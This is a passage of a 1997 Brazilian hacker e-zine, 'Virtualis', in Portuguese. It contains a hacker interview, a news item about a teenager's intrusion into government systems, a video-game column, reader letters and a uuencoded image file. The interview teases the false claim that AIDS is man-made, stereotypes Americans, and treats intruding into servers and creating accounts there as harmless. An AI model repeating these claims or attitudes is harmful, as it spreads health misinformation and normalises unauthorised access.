morte ainda não. Mas um webmaster (se é que ele pode ser chamado assim) me enviou um ultimato quando postei uma mensagem de divulgação da Virtualis numa lista de discussão. Talvez eu publique num próximo número. I: Como está sendo a repercussão da Virtualis ? Tem recebido muitos e-mails ? H: Tem sido muito bom, um pouco mais do que esperava. Na verdade não esperava receber nada. Tem muita gente que escreve só para dizer que achou legal. Outros querendo assinar, tem gente que pergunta até quanto custa. Tem mails dos wanna-bÉs querendo saber como detonar um site do Governo... E o que achei melhor, tem gente ajudando, recebi de três pessoas, várias sugestões e até alguns artigos. Tem gente boa escrevendo. Escreveu-me um carinha muito conhecido na Rede pelo pessoal de VB - o NetRunner. Ele encabeçava um projeto feito a N mãos via Internet. Algo parecido com o que o carinha que fez o Linux fez. Tem enviado coisas legais. Outro é o Fábio Câmara, escreveu um artigo sobre o 'auê' que fizeram sobre aquela música (Legalize Já) do Planet Hemp. Algo sobre liberdade de expressão. Acho legal abrir espaço para as pessoas se expressarem de maneira mais ampla. Trazer a tona questões polêmicas. Aliás, na próxima edição publicarei um artigo sobre a Aids que causará muita polêmica. Você acreditaria se eu dissesse que a Aids é uma criação do homem ? I: Não tenho opinião formada sobre isso ... H: Nem eu tinha. Até que aventurei pelo mundo das conspirações - planos secretos executados com maestria para que tudo pareca acidente, destino ... O foda é que se você ficar pensando, TUDO acaba parecendo uma conspiração. A gente acaba ficando meio paranóico. I: Vejo muita coisa sobre conspiração em alguns hacker sites americanos. Por que os americanos são tão ligados nisso ? H: Eles se acham o centro do universo. Ridículo aquele filme ID4 (Independence Day) onde os Estados Unidos salvam o mundo. Um país totalmente falso - cultuam a liberdade ("somos um país livre") mas são vigiados e catalogados todo tempo pelo FBI e CIA. São falsos moralistas, racistas e ignorantes. I: Nossa ! Você odeia mesmo os americanos ... Mudando um pouco, conte um pouco sobre a invasão naquele banco. H: Não sei o que você está falando. Não invadi nenhum banco. I: Não é o que dizem por aí. Corre pela Internet brasileira uma história que você tirou do ar o servidor de um grande banco brasileiro por 72 horas ... H: O que dizem por aí nem sempre corresponde a verdade. Se eu invadisse um servidor não seria para colocá-lo fora do ar. Provavelmente daria uma olhada, talvez criasse uma conta para mim e mais nada. Só faria uma coisa dessas por vingança. Já pensou se uso meu nome verdadeiro. Certamente estaria sem emprego esta hora. Agora preciso ir. I: Agradeço a atenção dispensada. H: Até a próxima. ==================================================================== [Por aí] Garoto pernambucano invade arquivos do governador Um adolescente pernambucano de 17 anos deixou de cabelos em pé os mais experientes écnicos brasileiros de computação. Durante três meses, C.I.M. usou o código de acesso a Internet de seu pai para fazer uma verdadeira devassa nos computadores da Universidade Federal de Pernambuco, UFPF, e do Instituto Tecnológico do Estado. Sua maior peripécia foi vasculhar uma a uma as mensagens eletrôni- cas enviadas ao governador Miguel Arraes. Como um Zorro dos tempos modernos, o garoto deixava sua marca depois de cada invasão. "Passei por aqui", escrevia. As aventuras do hacker (invasor) só foram descobertas porque o garoto consultou informações a que apenas poucas pessoas tinham passagem livre. Nenhum dos arquivos violados pelo garoto foi apagado, copiado ou danificado. C.L.M. poderia ter causado constrangimentos públicos ao governador Miguel Arraes se quisesse. Bastava enviar mensagem ao presidente Fernando Henrique ou a qualquer outro usuário fingindo ser o governador. Depois de iden- tificar os primeiros vestígios do invasor, os técnicos da Rede Na- cional de Pesquisa, a administradora da Internet brasileira deram início a uma investigação minuciosa. O garoto foi traído pela cu- riosidade e acessou o arquivo inventado por seus captores. Um pro- grama fez o resto: decifrou o número do telefone de onde partiam as ligações. C.L.M. pode ser processado por invasão de domicílio, dano ao patrimônio público, falsidade ideológica e violação de corres- pondência. Para remediar as falhas de segurança, os usuários da Internet pernambucana vão receber novas senhas. Revista VEJA - 09/08/95 - pg 42 -------------------------------------------------------------------- Microsoft se alia a Sega na guerra dos videogames Dr Herman A Sega, empresa japonesa responsavel pelo Megadrive, anunciou que a Microsoft irá participar do desenvolvimento de seu console de 64 bits. A Sega, que vinha muito mau das pernas, parece estar usando da mesma estratégia da Nintendo que se aliou a Silicon Graphics para fazer o Nintendo 64. Tudo bem, a Silicon é uma empresa renomada no mercado de work- stations e talvez seja pouco conhecida no mercado comum. Já a Microsoft, não é preciso nem falar. É a empresa mais conhecida no mercado de informática. Bill Gates que não é nada bobo, não desde- nharia um mercado que movimenta bilhões de dólares todo ano. Vejo dois tipos de jogadores - os que jogam em micros e os que jogam em consoles (videogames). Eu era um cara que se enquadra na primeira categoria (sou do tempo de Atari 2600 - aliás, tive um ). Sempre adorei jogos e foi esta paixão que acabou por me trazer para o mundo da informática. Com o tempo, me distanciei dos consoles e só utili- zava o micro. Era mais barato - pegava uma caixa de disquetes virgem e saía copiando tudo que achava legal. Os cartuchos de videogames eram muito mais caros. Surgiam aos montes as locadoras de cartuchos. Com o tempo, os jogos para computadores foram evoluindo e exigindo mais hardware - unidades de cdrom mais rápidas, placas de vídeo 3D, mais RAM, mais HD, etc. Não era mais poss¡vel para mim ficar com- prando estes componentes "superfluos" só para jogar. Acabei vendendo o meu micro por estar precisando de grana. Foi aí que conheci o PlayStation e eu, que passei muitas horas de minha vida jogando num Atari e achava que nunca mais iria me aventurar por estas praias. Muito mais barato que um micro mais simples - cerca de R$240,00 contra uns R$1600,00 de um micro padrão. O que me chamou a atenção foi o preço dos jogos (que no PlayStation saem somente em CD) - de R$5,00 a R$10,00 !!! E que jogos !!! Bom, o meu medo é que a Microsoft faça com o sistema operacional do novo Sega, o mesmo que faz com os seus Windows da vida. Programas cheios de bugs e totalmente instáveis. Já pensou estar jogando o seu game favorito e de repente aparacer na tela uma janelinha dizendo: "O game xxx não está mais respondendo. Aperte A se quiser esperar o game responder (até o fim dos tempos) ou B se quiser resetar a máquina". Mal posso esperar !!! ==================================================================== [Missivas] Este é o nome da nossa seção de cartas. Se você tem alguma dúvida, crítica, elogio ou sugestão, não perca tempo, escreva djá ! Sem feedback não irei muito longe com a Virtualis. Segue a relação de mensagens que recebi desde o lançamento da primeira edição. --------------------------------------------------------------------- From: "Caio Abreu Ferreira" Subject: Ezine Virtualis Date: Tue, 11 Nov 1997 23:22:34 -0200 Prezado DR HERMAN, Editor da Virtualis O Hack Hour é um encontro realizado a cada duas semanas que tem por objetivo juntar em uma mesa de bar, todos aqueles interessados em fazer com seus computadores mais do que lhes foi ensinado pelos fabricantes e desenvolvedores de software. A descontração tem sido marca registrada dos encontros, onde temas polêmicos e as vezes proibidos são discutidos com toda desenvoltura e liberdade pelos presentes. Entre os participantes não é difícil encontrar admnistradores de redes (Novell, NT, Unix), programadores expecializados em tudo quanto é linguagem existente, incluindo algumas que não são mais usadas, especialistas em sistemas de telefonia e curiosos em geral. Todos com a intenção de aprender mais e de ensinar o que sabem. Se você toma bits no café da manhã, almoça chips de silício, janta manuais de SO's e usa a "Biblia do Linux" como travesseiro, essa é sua turma e esse é seu lugar. http://www.hackhour.com.br/ Caio Abreu Ferreira Cosmo@mandic.com.br Sao Paulo-SP-Brazil ->>>>>>>>>>>>>>>>>>>>>> Coloquei este mail pois achei bastante interessante a idéia. Não pude ir a nenhum encontro ainda. Também não sei se estes encontros continuam acontecendo. Quem já foi e quiser relatar para os leitores da Virtualis, sinta-se a vontade. --------------------------------------------------------------------- From: sonia Subject: Olah! Date: Tue, 11 Nov 1997 22:18:24 -0300 Oi Luis! que bom que vc escreveu. A festa foi otima, fui pra casa lah pelas 2 da manha...de taxi! Mas tudo bem, afinal sou uma mulher do seculo XX, independente. Apesar de confessar que algumas vezes bem que preciso de um colinho e ombros bem largos :-) Foi bom reencontar o pessoal e fazer novos amigos. Parece que em janeiro terah um grande encontro no Rio. Estou pensando em ir. Vamos ver se terei grana. Depois deste pacote...xiiiiiiiiii!!! Beijocas So ->>>>>>>>>>>>>>>>>>>>>> Beijocas para você também Soninha ! Coloquei este para mostrar como as pessoas podem ser descuidadas quando utilizam o email. Pô, Sonia, eu não sou o Luis ! --------------------------------------------------------------------- Date: Fri, 21 Nov 1997 13:54:52 -0200 (EDT) From: Allan Patrick Medeiros Lucas To: Virtualis Subject: Re: [Natal-RN] A T E N C A O Caro Virtualis, Caso isso volte a se repertir, seremos obrigados a colocar seu endereco em nossa black list. On Fri, 21 Nov 1997, Virtualis wrote: > // Enviado por: Virtualis // > Caro colega, > Primeiramente gostaria de pedir desculpas pela invasao. > > Sou o editor do ezine Virtualis. Virtualis contem assuntos ligados > a vida digital como seguranca, privacidade, hackers, phreakers, > submundo digital, ficcao cientifica, entre outros assuntos. > > Caso voce queira receber *gratuitamente* o ezine, envie um mail > para o endereco > > virtuali@polbox.com > > com o subject ASSINATURA. > > Obrigado e mais uma vez, perdao pela intromissao, > __________________________________________________________ > Não perca a Virtualis #002 que sairá no início de dezembro > Uma edição totalmente dedicada aos vírus de computador !!! > > DR HERMAN > Editor da Virtualis > virtuali@polbox.com > virtualis@localbar.com > ______ > Summer - Natal, RN - Brasil - http://www.summer.com.br > Para sair desta lista, envie um e-mail para majordomo@summer.com.br > com o comando unsubscribe natal-rn no corpo da mensagem. > ->>>>>>>>>>>>>>>>>>>>>> Será que agora estou na black list dele ? :) ==================================================================== Como conseguir as próximas edições da Virtualis ----------------------------------------------- Infelizmente não estou mais mantendo o antigo esquema de distribui- ção via e-mail. Podia não parecer, mas o processo era totalmente manual. Tive que enviar a primeira edição para mais de 300 pessoas e a cada dia, novos pedidos de assinatura chegavam. As próximas edições só enviarei automaticamente para colaboradores e membros da Virtualis. Para conseguir as próximas edições, existem duas opções: * Na Internet: Via FTP anônimo no endereço ftp.etext.org, diretório /pub/Zines/Virtualis/ * Pelo correio: Envie R$2,00 (dois reais) em papel-moeda apenas para o endereço da nossa redação. Indique a maneira que deseja receber o zine - impresso ou em disquete (1.44MB,formatado no formato DOS/WIN). Para quem não sabe, é proibido enviar dinheiro em espécie por carta. Por isso, nunca envie apenas dinheiro em papel e nunca em moedas. Futuramente, espero disponibilizar o zine na Web. Quem quiser abrigar o zine em sua página, por favor entre em contato comigo para que eu possa incluir a sua URL nas próximas edições. ==================================================================== [Desclassificados] Esta seção é um espaço aberto aos leitores para que possam fazer pequenos anúncios (nada comercial, tipo: vendo micro ...). Nesta edição apenas anúncios meus. |------------------------------------------------------------------ | PRECISA-SE de colaboradores para escreverem numa seção fixa | | sobre shareware e freeware (análise dos softwares). Fica bem | | claro que o trabalho não será remunerado. | | | | Cartas para Dr Herman, endereço no final desta edição. | ------------------------------------------------------------------- ------------------------------------------------------------------- | ESTOU CADASTRANDO DISTRIBUIDORES para a Virtualis. A idéia é | | ter pelo menos um distribuidor por cidade. Os distribuidores | | receberão as edições da Virtualis em primeira mão, sem nenhum | | custo. | | | | Maiores informações, cartas para Dr Herman, endereço no final | | desta edição. | ------------------------------------------------------------------- ==================================================================== [EOF] Mais uma edição se foi. Tenho algumas idéias para próxima edição mas não vou adiantar nada. Espero já estar com um micro conectado na Rede até lá. Desculpem pelos erros de português e se alguma coisa ficou sem sentido - não tive tempo para revisar está edição direito. Se alguém quiser entrar em contato via email, pode enviar para o virtualis@yahoo.com. Infelizmente, não sei quando verificarei esta mailbox. Portanto, não espere resposta em menos de 20 dias. Vou ficando por aqui. Grande abraço ! Dr Herman ==================================================================== [Sexus - Presentinho do mês] ------------------------------8<------------------------------------- begin 640 Carla.jpg M_]C_X``02D9)1@`!`0$!+`$L``#_VP!#``4#!`0$`P4$!`0%!04&!PP(!P<' M!P\+"PD,$0\2$A$/$1$3%AP7$Q0:%1$1&"$8&AT='Q\?$Q)!P>'Q[_ MVP!#`04%!0<&!PX("`X>%!$4'AX>'AX>'AX>'AX>'AX>'AX>'AX>'AX>'AX> M'AX>'AX>'AX>'AX>'AX>'AX>'AX>'A[_P``1"`&-`DD#`2(``A$!`Q$!_\0` M'P```04!`0$!`0$```````````$"`P0%!@<("0H+_\0`M1```@$#`P($`P4% M!`0```%]`0(#``01!1(A,4$&$U%A!R)Q%#*!D:$((T*QP152T?`D,V)R@@D* M%A<8&1HE)B7J#A(6&AXB)BI*3E)66EYB9FJ*CI*6FIZBIJK*SM+6VM[BYNL+#Q,7& MQ\C)RM+3U-76U]C9VN'BX^3EYN?HZ>KQ\O/T]?;W^/GZ_\0`'P$``P$!`0$! M`0$!`0````````$"`P0%!@<("0H+_\0`M1$``@$"!`0#!`<%!`0``0)W``$" M`Q$$!2$Q!A)!40=A<1,B,H$(%$*1H;'!"2,S4O`58G+1"A8D-.$E\1<8&1HF M)R@I*C4V-S@Y.D-$149'2$E*4U155E=865IC9&5F9VAI:G-T=79W>'EZ@H.$ MA8:'B(F*DI.4E9:7F)F:HJ.DI::GJ*FJLK.TM;:WN+FZPL/$Q<;'R,G*TM/4 MU=;7V-G:XN/DY>;GZ.GJ\O/T]?;W^/GZ_]H`#`,!``(1`Q$`/P#S2,?+TJ50 M,YQ21+E0.>E3HO8'H>F?\_E0J`*E4#)(!P?\?UXQ2%<14X MY&.W/:IE0'@`;B.@['C'^?\`(5$'`'&!UXXX_P#K$_E4ZJ!(<#/3_/%?2^OD)HETW3]V:^8K]E:ZE./G M,C$\\?YZU43>B[MD''K28R<'KTH^M&/PJ[F[+FG/_I8U/YT-I,`X*G@\=2>>M:;! M'0,`:YRUE"X5F)!_BQ6Q93JRJK'GW]*FUM"'?<;?VX"!@,>V*P-0C4J8^<'( M)S],8_SWKMIX(YK)?+#;@I#9]>>E0C=[@\'IU[4+1A&5SCKB-XSRN,U%N MSSCWZUKZK;L$608(!P3]>F/4?Y[UCL,'!R:LNY)&<_2G-PM11MAN33W.!UQ1 M;6X(BR">^.E.)`XV\X[TW\?SI<[FQG..!0%Q\S(2FS@%1D>A[TQ1D9Q2GGJ: M7'RYS^-`QG;/-%!`Z<`XH`STH%J.<`8QG!YIO.*7(*D$^]`%,"6/!44_;[=? M2HHC@@9KMM+T:.6U0M&WS*.G7-3*RU8F[''1Q.7\H(0WH:TK;1;^=%`C"HQS MR/\`/O6KXDTXZ;JMI>["T4K`,/0CC]1V]JF\1:S,/RN?\]/\` M.*<4GJ0Y-V41-.\&32D&:=,,.`H[\_\`ZZZ33_"%M'."L8.?EX7G-"JH>V'`SL0J,YY[U:21E*-9['I^C>'[.`3$0HODL M`5`]>H^I[]\0_#@\4>"[G2;.;RI)&61-W3<#D`_C7B>C_!+Q MK>Z@D-W:PV5L7"O(\77MD8Z?E23_%3Q/-('>\E)'3+ MY`_2E=K9&E.%6"L?47P]\%^%/`^CM:V=TAE=0TTC??D;'Z"K6I7>C;25B!SG MEZ^29OB3XGE/%\P)ZGK4-Q\0?$LIR-0D4=,9SQ]:-294*DW<^B];EMIMQ01J MO/0`5R5W96LQ<;DSD#/7'UY].?\`]1KQ6;QGXB==K:G+TQVKH?AQKVIWNKS0 MWEW).OE;QN(X((Y''OUIK32Q$\/.*\76MND#R16_[Y\+\H/8'MUKH[S2K@*?W#Y_ MW36=3?0TA4<8),\9\2P"WN$0+@[3Q^-8RK^[9\<#BMWQO%+!K\T4T;1D=`PQ MQS6&%9B(T!))P`!GFJBK(ZXNZ(]I_6@@XSCBMNQ\-:O=('%J8D)X,GR__7JX M/"\B*//E#-Z(.GXFIM-88QR.E:>KVBVMT8PK*G;-9\@[X%-.X M#`!2_C2<=<_E2\XICN.BYR,4LA%(AR1N M8=/R%9NG6P9UCS^`&/PXKK((!##WP.]"5]3"I-K8X_XEQ@6>GG`!5Y%'TPM< M/C-=W\1V\S3+1\GY;AEZ^PKA>, MNP^$#!?&ELQ4]F?0A48QCVJ)TQ@&K?EG&` M:]"F1CCITZ4PJ><%A[Y]JM2*#GO417G]::8BNPR=V,@\^N`?\FHF5B/[QQS@ M]O\`/].M66&1Z]^:CD7@@GCDX_/U_'\J8MRL%^?+#J>>,YSZ<5ZUY+_\]/\` MT+_XJO*]HWYR,D^W/^>OY<5ZWF?^_'^O_P`57-7ERM:'I9>K\VO;]3Y_B4[> MF0?\_P"?\BK"C'4<^N:;`I"`@X/?^G44U!_%@0!R/Z'\?RI!L`QC).1Z=ASG'^?_KU,B9&3SU'0?Y__72*H(X' MX^A_SQ4R+S[FJ8D*`">1^%3QJ!@XIJKQDFIE&3@#.3Z5-QF1XR/E>&+UQD?N M\<5\Q3G=,[>,KC/ZU\T3C=.Y'&6Z\5<3HH=2$^HYI0 M/8\"@X/0=:0?051NR:W0R.J+SFM-#%*,01)$3@A=V0&X'4GUY]!FLZV=UE!0 M\DXZ5;=4:0,Y51@MM48)`/H>O&:HQ>Y=MY@&`4@'J".OXC_/Z5H65SCYMV3U M_E_G\ZQ9K@M([NV750%YSE1T_#I^M31SD'G@8RNE1TN]P(!;`S4,S:Y7>W7C\/Y52 M9HF8'N*DPSJ%523[42H48Y&.U+#/-`28I7CR03M;&2#D'\#5E$9!&,D\]U'EMVSC-`##GMG\*5/OQLO7J MN,TW8>@XQ0%A&`##'(I,$\@$C."<=Z4H>!2`$]!3$7="-HNKVS7X!MA(/,SG M&/?VKVJPU[P:NQ1=VB@#&.:\)"MG[IY]JG$-P.%23GT4U$HJ74B4.8]V\5:G MX+O?#ES!Y]LS;"4ZDANQ'O7D/BHVL@L1;7HO)5AVRLJX&[VK)6"Z886&4@G^ MZ>:D194$#=;'/0?X52*DWT&Q> M#/$4X7R=/W[ASAEX^O-6XOA]XG<@K91Y)&`9`3XC>+(=I%@L9_A*6XP.>W^?UK,OOB?XIF MDE=7YD^4_)AL>YQ_GVHOV$G4.)E\/ZU#G?IEV,=_*)'YU7.F:CG/V"YQG'^J M;_"NGE\:>(;F"1&GD)11@`G);H>WOT]`:I?VKXHN%W)+<$,2?E'Z>M&IHG(P MVTZ_3A[.Y'UC-;W@"\BTC69I[XF%1`1\T9/)(_+H::[>+)2&8SL2,#(6JDND MZ\^6>WD^8`-\XY'49YI`_>5F>X?#3Q[X6LM,G>ZD<3O*6)$>3UZ?E6_=_%#P MN0P#R9Z_ZNOFY=!UHJ=MJ^TC^^.?3O4G_"/:PZJ7BX``&YQP.N/\^M0Z:>K9 MG[);7-'XJZU::[XLDO+%B81&$&1CG))_G^EI=P$"6,_+D9'3%6K[ M2-0LH#<7,&R/(`.X'/Y5GAH':J;_,,`4\H M!SR*38,8JKI!L1X]C2A>,^GM4FP=::P`XS[4UJ,:#C`ZDTG.<#'7BE)]J=&N MY\"A@6].MR[AF7*`\CU]JZFUC8QJ&!^7CGM_GK69I\&&55(`7!8@=\?_`%JZ M?3+3FK^K7`C_=+UP>]1-*MF5(/.,D`]/>L MK4[S>S$OAR>W:ANR.>SG*YD>.?GT*W<9`^U,,>GRUQ6*['Q5*9?"T18G=]LY MY_V*XZH1Z-/X$`KK?A(0/'%D.Y.!7)CK75_"<_\`%;V&!GYN@[T-Z!/9GTGL M'3''O3'0=.IZGCZ59*8[]?6F.N`#D]:B^IYC*N.XHC502,$* M=NO3U_&ID7G!'4]#T[T*I&%!/U/_P"O MKUJ5`!QGM3O<0Y%)`)-3*@Q]*;&*G10".H%2V,$7)QP*GC0<'.._)I$0#T], M9S4Z(2V`.AS2`Y3XH-M\*S`G&6'(_&OFZX0I*Y!W#/W@P(YZT:\"7'#`@'J!7,?:8,8C4JIY!S]T>G.,CMGV^M3V=P(VP`H;.#Z=L_T_ M.DUS",2V<+EA@GGIQ^E:^GW4D$_V:?`(ZD'(^N:O M:G8"YA+*>HY/2IO8S7NO4\VU.U)E+(,D]@,_YXQQ645(X/&/:NOO(O*E*$;B MF0O&./I_G_#G-2@\N3*H0.^?KTK1&R94C..O%3`9!%0CIG-/60@9![T6N,T; M"&$R`R?-SCJ,9Z_Y_P#K5Z%X1715*+6^8P(P>G2IXM1NXL&.9 MUP,=>U<^)P[JP<4['3A<0\/-3LGZGT+>V'@Z2Q)5D63;_%US7EWB'2])%PQ@ M*`'.>W^>ECBSB/.P?]\T\62#`"C/7@5YL/&>M$,]9,@+RPEE.^SKC``YX]C7%:=XQE*N+R MXA5ER``K>WM6]9>+-/$.Z:^L,CJ?*D(!_P`YI^S=C-\RZ&L+6,Y!`P>>>*9) MIEI(V9((RV>`5%7++Q?H">4TFLZ",]0UK(Q!]ZFU/QMX?&T1ZOH1/0A+"3]> M:7O;%\LK7,I=)LE&1;IDE<] M<^+HO/SDRU&1Z@($SD@9IWDH<<_K7E"^( M-;*E_MTQ080D]`2#C.!UX)_"HO\`A(-7*J/[0GXZ'?0J4A\C.I^)LRI:V]HG MWG)<]\`YN))F`P"[9XID-U/#_`*J5 ME^AK10DHZ&D$EHSV'PE\/K35U"F6&,`Y!,_A[IFAQA3=0,>N(R M,GC%>96'BW6+./9%<9`Z9)JOJGB35=1&+BX..N%8_E7F?5\8JMW4T/8>+P7L MN54M>]R77(;2*X<1.#C[I!S^!K*8C/7(-1%R>XI`V3D=Z]:,7;4\AZNZ)6^4 M@GG/()[\U"#2EC["FC)]#56L(,9/'>KVG1!Y,L,A>N>F3_D_E5:VB:20` M`_SQ[UO64(C(5&Y8\CU_SFH8,T=)M?-F*J#T!_#K7800"WM=Q"J0,9_I67X4 MM3B61V!VG;P>!CK@U;UJ]"+Y:$`#KGU%"=M3GG>3LC+U2YW%L28P,GBLFZN& M"L&!R>#D^O\`6FW5Y()B4=2PSDE<_P`^O:J#S^=([MA"3C&-N>G3]*6^II&- MD7-7);P9&23Q?#CM]QJY8@#/!]JZ6^=V\&DL3Q?)@>GR-^GUKFAUQU%3_M43ID8/T%6MO`&1@C]*8Z';DBLGN>6RFZ].?I4#IC..!U]:N.@)Z#G MUJ)DZ]N33TW(*I0'HO3I^E1,HZXX-6RO<]?\_P"?PJ)DP3T'7M0,K[?F&!CZ M5Z?^\_Z8_P#CE>;;065<8Y[UZ3]I?T_\>;_&L:M]+([\#;WCPV%3M'!_#TJR MBDDXQ],CK]/\^E,@7Y`#@'W'3Z_G5F,`CDG`'4?+VS_GZUJ@X]Z&P%C7TJ>-?:OGC""0!F*J M6&XA<\=R!Q^5?0'Q[9?['AC<@##G]*^?Y5"X*L""/4'Z\=JT3.R@K1N0$C)Q MT]ZN<\?YXJSG8J$[T?#`,<#)SS[?I23(% M1Q_P#K_E0!&HR<*"<] M0!S3T>2$9"8R003[?_KJ2VN9;21FC4!F1D)<9.#P?Z]*A+NY^9B2,G'OF@$; MVF3$%6#G;VQP,=?\>OK7;Z'=_:(Q$V3Q@5YQ;W`:-$.P,`%QC;QT_$X_/-=% MHEY+&V=Q`'!.>M3+N9RC#M6NXA-$81&Q M.-[XR/RJ8^!=8V\R6F3_`+9_PKTJQ@2*UBBX^5?R-6&(!'3&`]8/_+:TY'=V_PI1X"U@_\`+>S_`.^F_P#B:]0W#J1C_(I<@C&<\=ZGVC&Y ML\O_`.$!U;^*YM!]&;_"D7P+J1.U[FW&?J?Z5Z@S*5SGG)/'X4W.&VJ5XZ$5 M/.WLP51GG47P^O&.&OHQ](S_`(T\?#VYX_XF*Y)Q@1'_`!KTA'12>5YI\3*T M@`/'4U2J-+DQSQCJ,?Z;=Y/N!_-:[T7/!&W)/4\_P" M(K*\AFCBN0DZGY`"3D^V*+6ZU![1;H.^-X5H\$X]!Z=A6/URSLSM6"JM7,1? MAIHYR`9V]PQ[4-\--&SD>>/^!&NK_M0`A9(F7H#NYQD<9]JG^U%N01CKGKQ6 MD:_,KHY:E.=)VD<0?AMHX[S].SG'^>*5?AMHQ./W_P!?,SZ"NR-PV<'&?KWQ M0+D\<#`.>F/\_P#UZ?M9LS,CUZC%5UD!`Y%'M)#4F!M%[VS].?WK5U3R`#(-,:7`QGIWH]I+N%V$O?_EJ:8?!&CD; MO*F`_P"NAQ74M+DY&?2F&48SCM5*I&*QT*%RV`N00Y?.X99@/7]?\]:8;U(GDB9OE8_*#U!]JRKJX1G"AN#RVT\_P`_8_I5$J.K M8^>1@Z5F]V=-/X4*H!X&.3@9XKH?AJ^WQMI8SC,P&!7.C!Y) M]ZZ+XA_SBD]BF?6(`QD'M]:;(HR=IXSG`J<)NC'/4 M3+>Y4D7'X5`ZY'-6W7&>,5"Z'J1UI(EJY59O5/+;U3_ M`+['^-<]9I-7/1P'VOD>!P!MJ[5R<\>_7UJ=5X&#P!QQZCMD\5'`IV@X)/7I MV'/^?K[5/&J@#'/X?E6YR#T4GG\N.U3(H/4TD:G(J:->*70-1R+T&?QJ:,=_ MQIJ*2`?7CFIT!]./7-3Y@/B4].,U.JCT_P#KTR-!P/05812,`&A[@/C7(SUJ M=%..G%,7.T$=:LQ`<<=NE,9Y'^T$R_9[6)VVAD;)!['^?^->"R=`!U''3G/I M^M>Y?M#$M/!&IY$6?U_^M7B#I&$E)E:'AQ3]GD8CJV!VJY?P?:(-C+DC[N,=?6J3Z',]SGDPLQ21.">=S8_,U*T MHVA59N0"B@'(]!CH>_-,N%=&V2H4/J>21[_Y_"H7#J2'')`.>OX_SJADT4D: MLWFIR0RGY1GG//(X/;_"H2NT[67:V<8/8\^OX4S)[#CO02?4>YS0*PY&"L"` MK8/0CK6G9W_DA48`-Z*O!'8?_JK*)/J?_K?YQ0&P002,>G:@+'5Q7IN&);@C MCT^G7^=:>B()+M)OX(_0XS7'6%V4*H[*J@\<5NV^M006PV$[`!DX'7_&I:$T M=U'#TK/D(Y3NUG& M.N?6G>=N3@\=/_`*U//B1#PH?C.<=OKZ4N0'%]#LY) MU')X&:C2Z4M]X'CUZUQH\0HYP%9L'''^?UI@U]=X12&?M]*%3'RG?Q>(]S.`&;NH`IR^)!M)`(P,G\\4>S%RL]&%Z#P&'Y4Q[T#) M9P/3FN`/B)HP"P^7CG\*:^O3,R*(R6?H`?YY]*/9L.0]`6\'`W#BIA=@8#?Y M]Z\XD\1,D@^7IT\0OCE20.N#VZ\R8VBO-,%]=PLP29``7P,''^?QIUYITE[?2;B1$KCRD'\(KSJ^*C M&7*>Y@,NDX\_5G#Z%H^I6XNN?:7OMPBV)-]]"`!P.GI]#_\`7K)U69]* MD\Z-B]JWJ.5/I_G^M;LEU+IZ5[:@FKH^9G2<78[TW@&,$TTWI/)?TKA MAK[\`JQ!X`S_`#IK:\P`(4[CSSS_`)[4_9DOZU'/XBF5F0%5(&>F?P_SZT_9H?*SO&NE'1QS3&N@!G-<++XE?<0L><<9! MS4+^))S&`L8W`')[9_SG]*.47(V=V]VO3<#C_&F"['K^%<$VO7!0C;T[$]?_ M`*](=>N<9\O#=^3VJK![,[/5F6YM"I;!7)4BN3N961RK`;L],]SBJ_\`;UST MV9.>.3TJI>W\ERN64!CG..X_SFJ6A:C8CN+AWD/R@`$CH..QJ!,<9Y'H._L. M*)'#MD<+T`)S@"FY'UIE$@90"6&>,#L!Z?IZT2,C1IM$ADYW$G(//&..*C!) M'`]A2<=!3`W;)MWA#4%+`TRC/XU@*<=1ZBMSP)D>+=- M('2=3Z9_STH>PWY'V(J90$G.<4QDP,8R35B-H7FHBIS@# MOWJ;V8]T5V'S>G->G9B_N/\`]]#_``KS.E6(QGWH8T/1 M2!TXJ9%)'>F(O3O_`%JQ&.`,\>F:D8Z-<8(Y[U9C0#M3%7C&,U81.`#P.X-5 M<-SPG]HE@=6CB(9@(UP`/?Z_2O&+K'F$KC!5<8/&,8KV7X],&\2.AP2L2@!J M\=OU"SD$YS@@X'`I0?O6/4IQM13*C9SDCD\T_!`!(QD9&:8<;N]3S9!3(Y\L M M#5ROX4/,X_SV MKHV48P3D=",U3ND5%(&<=_<_G_G\:J+OH(YR2-E/.#Z8;.1_D4TD#``''ZU; MOK81-OB'R$`XSGG.*JHVS("*S=B1G'X510S\,T9R>U7=573O,1K!I0K1*2C\ MX?N,\>_^3Q1R1_6FAC@2?3\:4=.F::#ZT[.5P`/6D(=DCE2%[#!],4BNR#`8 M@'MV/UI79P#%N`"L3\OKTZ]Z9G!XHL`\DD`1WS^&:KQLBR M!C'NQ@[2>_X4BN5Z,1D/T^M(C M]1Y&.0/\FC\2<>E`B196`4C'RC`..G^>?SI#E>#G(Y&>W6FDL<`GIQU]_P#Z M](*+(98MGB3)D!WC`CP!CKWS^=6&D_=QX(+M@CIGZX_3\:HQL4(8=N>OXU,K MO(Q#R;5)^;^73OTH`NLQ8!5*JP!X/?DC\LXY_E6KX=L)-0U)$'W!EG..@_S_ M`#K!M]HF"E@"!C@CD8]?KZ?_`*O2OAWI#O9M<;US,6`'<84'G\:PQ%7V5-R- M\-2]K446=+;SQV6E)"BB/:I0`X^?R['<: M992,N5B/0\CKCU^O^>*-6L&9(P%(*,2,?R%5_"VM36MQ'!,[O')]Q9!R..F> MM:VO:W:1*46$3.#C"G%I-`F-A0_,*RGL%(\S)R,' M&<`@G_'^M=%J[/A\?CJ3IU"W'=S%E5F'..V M2:9-.[2-M`VD8Y7KUY_F:B#-T#'Y0<#/3_.*U%@)II9.0O&#U4Y'MS^!YS_*H,8."1QZ\T9QGD\Y_'_.*:2>FWM02>_KTI#29QT-`6%SWSD^M&2.V/\:3-*,=Z``YR<@\4O;/:DP>A_$= MZ.2"23_.@#7TUR/#.K+Z/;D?FU93;WD9G(+$DMGUZ\^]:VDG;H6JY?:`T#9& M#@AF[?Y_&LD@DG))ZDYXY%0]V=4/@0P#W%;?@HE?$MBN*M='I9?]KY'A M\&!&JC@]!_G]:M1$>X[U6MU_=J23T'TJQ%VR,9]:[NAP/>!^M3QC'&:AL:)DP``2:L+\N> MG/8U#&",#-68^1[=,4UJ4R:/V]^]6(ER.@P?:H8UZ#K5B,>A]\T#1\[?'*5F M\7W"*P!&T_?'>E#XCUH*U!%,#YA3Y"`P*$G@=N^*3&#CBGW(4R M97.,#&>O3-;K,D'UIM6U1S274FD;:&&X\#/3/^>E4[G> M`68\*2"`./\`]57G8Y)('MQ52Z7+97'/5NW48/IWHB);E)RW0DGVQW[_`-:S M)XV8M*""O7.0.PR?\]ZTSN5^&^8Y!(.#Z54OII!&L0.0-QZ>O!_IQ[5;*13E 